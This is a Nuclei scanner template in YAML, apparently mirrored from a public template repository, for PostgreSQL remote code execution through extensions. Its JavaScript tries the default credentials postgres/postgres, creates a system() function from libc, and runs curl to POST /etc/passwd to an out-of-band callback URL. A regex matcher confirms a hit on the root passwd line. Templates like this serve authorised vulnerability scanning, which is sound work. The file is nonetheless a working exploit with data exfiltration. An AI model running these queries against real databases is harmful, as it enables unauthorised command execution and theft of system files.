mirror of
https://github.com/projectdiscovery/nuclei-templates.git
synced 2026-02-01 00:03:39 +08:00
50 lines
1.7 KiB
YAML
50 lines
1.7 KiB
YAML
id: pgsql-extensions-rce
|
|
|
|
info:
|
|
name: 8.1 > PostgreSQL Extensions - Remote Code Execution
|
|
author: pussycat0x
|
|
severity: high
|
|
description: |
|
|
PostgreSQL allows for extensions, which are modules providing extra functionality like functions, operators, or types. Starting from version 8.1, these extensions must be compiled with a special header for compatibility with PostgreSQL's extension mechanism.
|
|
reference:
|
|
- https://www.dionach.com/postgresql-9-x-remote-command-execution/
|
|
- https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/SQL%20Injection/PostgreSQL%20Injection.md#using-libcso6
|
|
- https://hacktricks.boitatech.com.br/pentesting-web/sql-injection/postgresql-injection/rce-with-postgresql-extensions
|
|
metadata:
|
|
shodan-query: product:"PostgreSQL"
|
|
tags: postgresql,js,network,rce
|
|
|
|
javascript:
|
|
- code: |
|
|
const postgres = require('nuclei/postgres');
|
|
const client = new postgres.PGClient;
|
|
const collab = shurl
|
|
const qry = ["CREATE OR REPLACE FUNCTION system(cstring) RETURNS int AS '/lib/x86_64-linux-gnu/libc.so.6', 'system' LANGUAGE 'c' STRICT;", "SELECT system('curl -X POST -d @/etc/passwd "+ collab +"');"];
|
|
for (const x of qry){
|
|
connected = client.ExecuteQuery(Host, Port, User, Pass, Db, x);
|
|
Export(connected);
|
|
}
|
|
|
|
args:
|
|
Host: "{{Host}}"
|
|
Port: 5432
|
|
User: "{{usernames}}"
|
|
Pass: "{{password}}"
|
|
Db: "{{database}}"
|
|
shurl: http://{{interactsh-url}}
|
|
|
|
payloads:
|
|
usernames:
|
|
- postgres
|
|
database:
|
|
- postgres
|
|
password:
|
|
- postgres
|
|
|
|
attack: clusterbomb
|
|
|
|
matchers:
|
|
- type: regex
|
|
part: interactsh_request
|
|
regex:
|
|
- "root:[x*]:0:0:" |